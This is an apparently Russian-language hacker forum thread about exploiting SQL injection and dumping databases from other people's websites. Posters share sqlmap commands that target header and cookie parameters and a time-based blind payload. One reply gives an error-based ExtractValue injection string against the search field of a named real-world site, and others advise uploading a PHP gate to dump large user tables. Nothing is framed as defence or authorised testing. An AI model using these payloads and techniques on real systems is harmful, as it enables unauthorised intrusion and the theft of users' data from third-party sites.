 |
|

01.03.2015, 12:44
|
|
Новичок
Регистрация: 07.11.2013
Сообщений: 12
С нами:
6586166
Репутация:
0
|
|
Сообщение от Unknowhacker
Есть способ заливки шелла через infophp.php при отсутствии инклуда?!
есть, но необходимо наличие фтп или цпанель
|
|
|

01.03.2015, 16:03
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от andrxx
есть, но необходимо наличие фтп или цпанель
ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
|
|
|

01.03.2015, 16:16
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами:
8255126
Репутация:
0
|
|
Сообщение от lifescore
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0
id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
Пробую способ:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
Вектор атаки найден:
Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
После найденного вектора запускаю скрипт:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
SELECT user(): None
И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
|
|
|

01.03.2015, 16:59
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Интересует вывод таблиц из этой инъекции:
Код:
http://naftogaz-europe.com
Note:в поле поиск '
|
|
|

01.03.2015, 17:28
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Unknowhacker
Интересует вывод таблиц из этой инъекции:
Код:
http://naftogaz-europe.com
Note:
в поле поиск
'
'or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1
|
|
|

03.03.2015, 06:58
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
|
|
|

03.03.2015, 07:10
|
|
Новичок
Регистрация: 07.11.2013
Сообщений: 12
С нами:
6586166
Репутация:
0
|
|
Сообщение от MaxFast
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
mysqldump
|
|
|

03.03.2015, 15:20
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами:
8265206
Репутация:
40
|
|
Сообщение от MaxFast
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.
Единственный минус - будет долго рожать.
Базы от нескольких гб - от получаса.
Зато валидный дамп, что не может не радовать.
|
|
|

05.03.2015, 01:21
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8581933
Репутация:
0
|
|
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
|
|
|

05.03.2015, 02:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Xsite
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
слить быстрее через инъекцию основанную на задержках? ну не знаю склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
|
|
|
|